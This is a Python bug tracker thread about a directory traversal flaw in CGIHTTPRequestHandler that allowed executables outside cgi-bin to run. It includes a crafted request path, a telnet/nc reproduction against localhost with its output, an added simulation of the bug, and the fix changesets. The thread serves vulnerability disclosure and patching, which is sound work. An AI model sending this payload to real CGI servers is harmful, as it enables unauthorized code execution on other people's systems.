Issue 19435: Directory traversal attack for CGIHTTPRequestHandler

Created on 2013-10-29 16:34 by Alexander.Kruppa, last changed 2022-04-11 14:57 by admin. This issue is now closed.

Messages (6)

msg201645 - (view)

Author: Alexander Kruppa (Alexander.Kruppa)

Date: 2013-10-29 16:34

An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.

The problem is that in CGIHTTPRequestHandler we have:

    def run_cgi(self):
        """Execute a CGI script."""
        path = self.path
        dir, rest = self.cgi_info

        i = path.find('/', len(dir) + 1)

where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the collapsed path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.

An example exploit is giving the request path:

///////////badscript.sh/../cgi-bin/cgi.sh

Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:

(echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443

This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.
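The index mismatch described in this report, as an added example that is not part of the original message and is not CPython's code: `collapse`, `translate` and `resolve_script` are simplified, hypothetical stand-ins for the server's path collapsing, `translate_path` and the `is_cgi()`/`run_cgi()` pair, and the web root is constructed in a temporary directory. With `use_collapsed=False` the raw request path is indexed as in the snippet above; with `use_collapsed=True` the collapsed path is indexed instead, which is what the later changeset message in this thread describes.

```python
import os
import posixpath
import tempfile

CGI_DIRS = ['/cgi-bin', '/htbin']

def collapse(path):
    # Simplified stand-in (assumption) for the server's URL path collapsing.
    parts = []
    for seg in path.split('/'):
        if seg == '..':
            del parts[-1:]              # drop the previous segment, if any
        elif seg and seg != '.':
            parts.append(seg)
    return '/' + '/'.join(parts)

def translate(root, url_path):
    # URL path -> file under root; empty, '.' and '..' segments are dropped.
    words = posixpath.normpath(url_path).split('/')
    return os.path.join(root, *[w for w in words if w not in ('', '.', '..')])

def resolve_script(root, request_path, use_collapsed):
    # Returns the script (relative to root) that would be executed, or None
    # when the collapsed path is not inside a CGI directory.
    collapsed = collapse(request_path)
    sep = collapsed.find('/', 1)
    head, tail = collapsed[:sep], collapsed[sep + 1:]
    if head not in CGI_DIRS:            # the is_cgi() decision
        return None
    # Reported bug: the raw path is indexed with len() of the collapsed head.
    path = collapsed if use_collapsed else request_path
    dir_, rest = head, tail
    i = path.find('/', len(dir_) + 1)
    while i >= 0 and os.path.isdir(translate(root, path[:i])):
        dir_, rest = path[:i], path[i + 1:]
        i = path.find('/', len(dir_) + 1)
    script = rest.split('/', 1)[0]
    return os.path.relpath(translate(root, dir_ + '/' + script), root)

def demo():
    # Constructed web root: one file outside cgi-bin, one script inside it.
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, 'cgi-bin'))
        for name in ('badscript.sh', os.path.join('cgi-bin', 'cgi.sh')):
            open(os.path.join(root, name), 'w').close()
        req = '///////////badscript.sh/../cgi-bin/cgi.sh'  # path from the report
        return (resolve_script(root, req, use_collapsed=False),
                resolve_script(root, req, use_collapsed=True))

if __name__ == '__main__':
    print(demo())
```

The leading run of slashes matters because each prefix of it translates to the web root, which is a directory, so the loop keeps advancing `dir` through the raw path until the segment after it is taken as the script name.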

msg201647 - (view)

Author: Christian Heimes (christian.heimes) * (Python committer)

Date: 2013-10-29 16:48

I can confirm the issue:

$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi

$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT

hacked

msg201673 - (view)

Author: Benjamin Peterson (benjamin.peterson) * (Python committer)

Date: 2013-10-29 21:10

Patch

msg201747 - (view)

Author: Roundup Robot (python-dev) (Python triager)

Date: 2013-10-30 16:51

New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7': use the collapsed path in the run_cgi method (closes #19435) http://hg.python.org/cpython/rev/e4fe8fcaef0d

New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1': use the collapsed path in the run_cgi method (closes #19435) http://hg.python.org/cpython/rev/b1ddcb220a7f

New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2': merge 3.1 (#19435) http://hg.python.org/cpython/rev/dda1a32748e0

New changeset 544b654d000c by Benjamin Peterson in branch '3.3': merge 3.2 (#19435) http://hg.python.org/cpython/rev/544b654d000c

New changeset 493a99acaf00 by Benjamin Peterson in branch 'default': merge 3.3 (#19435) http://hg.python.org/cpython/rev/493a99acaf00

msg222911 - (view)

Author: Roundup Robot (python-dev) (Python triager)

Date: 2014-07-13 05:21

New changeset d367ea865ea4 by Ned Deily in branch '2.7': Issue #21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/d367ea865ea4

New changeset 4de94641ba3e by Ned Deily in branch '3.2': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/4de94641ba3e

New changeset b957f475e41e by Ned Deily in branch '3.3': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/b957f475e41e

New changeset 385f4406dc26 by Ned Deily in branch '3.4': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/385f4406dc26

New changeset 22e5a85ba840 by Ned Deily in branch 'default': Issue #21323: Fix http.server to again handle scripts in CGI subdirectories, http://hg.python.org/cpython/rev/22e5a85ba840

msg222913 - (view)

Author: Ned Deily (ned.deily) * (Python committer)

Date: 2014-07-13 05:34

See Issue21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life).

History

Date | User | Action | Args
2022-04-11 14:57:52 | admin | set | github: 63634
2015-10-02 00:47:18 | martin.panter | link | issue14566 superseder
2014-07-13 05:34:43 | ned.deily | set | nosy: + ned.deily; messages: +
2014-07-13 05:21:15 | python-dev | set | messages: +
2013-11-01 00:39:27 | Arfrever | set | nosy: + Arfrever
2013-10-30 16:51:29 | python-dev | set | status: open -> closed; nosy: + python-dev; messages: +; resolution: fixed; stage: test needed -> resolved
2013-10-29 21:10:13 | benjamin.peterson | set | files: + cgi.patch; keywords: + patch; messages: +
2013-10-29 18:49:24 | janzert | set | nosy: + janzert
2013-10-29 16:54:48 | glondu | set | nosy: + glondu
2013-10-29 16:51:02 | barry | set | nosy: + barry
2013-10-29 16:48:40 | christian.heimes | set | priority: normal -> release blocker; assignee: christian.heimes; versions: + Python 2.7, Python 3.3, Python 3.4; nosy: + larry, benjamin.peterson, georg.brandl; messages: +; stage: test needed
2013-10-29 16:35:41 | vstinner | set | nosy: + vstinner, christian.heimes
2013-10-29 16:34:01 | Alexander.Kruppa | create |